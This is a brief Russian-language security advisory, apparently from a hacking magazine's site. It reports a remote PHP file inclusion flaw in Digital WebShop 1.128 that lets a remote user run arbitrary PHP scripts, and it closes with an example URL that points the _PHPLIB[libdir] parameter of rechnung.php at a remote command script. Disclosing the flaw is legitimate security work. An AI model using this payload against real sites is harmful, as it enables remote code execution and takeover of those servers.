Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Digital WebShop 1.128
Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе.
Пример:
http://target.com/rechnung.php?_PHPLIB[libdir]=http://target.com/command.php?